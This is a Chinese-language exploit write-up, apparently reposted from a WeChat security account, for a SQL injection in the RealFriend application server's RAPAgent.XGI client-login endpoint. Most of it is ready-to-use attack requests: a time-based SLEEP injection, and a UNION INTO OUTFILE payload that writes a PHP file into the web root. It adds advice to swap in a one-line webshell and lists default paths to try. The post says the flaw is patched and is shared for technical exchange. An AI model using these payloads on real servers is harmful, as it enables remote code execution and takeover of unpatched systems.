跟之前公开的漏洞非同一个。
经测试版本<7.0.4.1都存在
出现问题是出现在客户端登录
下载客户端并进行登录获取数据包
http://110.xxx.xxx.xxx/RAPAgent.XGI?CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6&Finger=A45A2E5E3&IP=
打开后提示用户名或密码错误八九不离十就存在SQL注入点
如果打开提示数据库连接错误,就修改AppID进行递增使它提示用户名或密码错误
SQL注入payload
/RAPAgent.XGI?CMD=GETApplication&AppID=APP00000003&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6%27%20AND%20(SELECT%209990%20FROM%20(SELECT(SLEEP(5)))Joqo)%20AND%20%27DseX%27=%27DseX&Finger=A45A2E5E3&IP=&Finger=A45A2E5E3&IP=
也可以进行写webshell
/RAPAgent.XGI?CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6%27%20union%20select%200x3c3f70687020706870696e666f28293b203f3e,2%20INTO%20OUTFILE%20%27C:/Program+Files+(x86)/RealFriend/Rap+Server/WebRoot/custom/InfoPage1.files/poctest.php%27--%20-&Finger=A45A2E5E3&IP=
0x3c3f70687020706870696e666f28293b203f3e
是文件内容十六进制格式,可以根据自己需求写webshell一句话木马
C:/Program+Files+(x86)/RealFriend/Rap+Server/WebRoot/custom/InfoPage1.files/poctest.php
就是写入地址,我这是常见默认路径,有些人会安装到D盘就是
D:/Program+Files+(x86)/RealFriend/Rap+Server/WebRoot/custom/InfoPage1.files/poctest.php
C:/Program+Files/RealFriend/Rap+Server/WebRoot/custom/InfoPage1.files/poctest.php
可多增加几个目录提高准确度
访问http://110.xxx.xxx.xxx/custom/InfoPage1.files/poctest.php
该漏洞已上报cnvd,官方已发布漏洞补丁,本文仅供技术交流。
原文始发于微信公众号(安全无界):【0day挖掘】瑞友天翼客户端Rce-附批量检查脚本poc
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论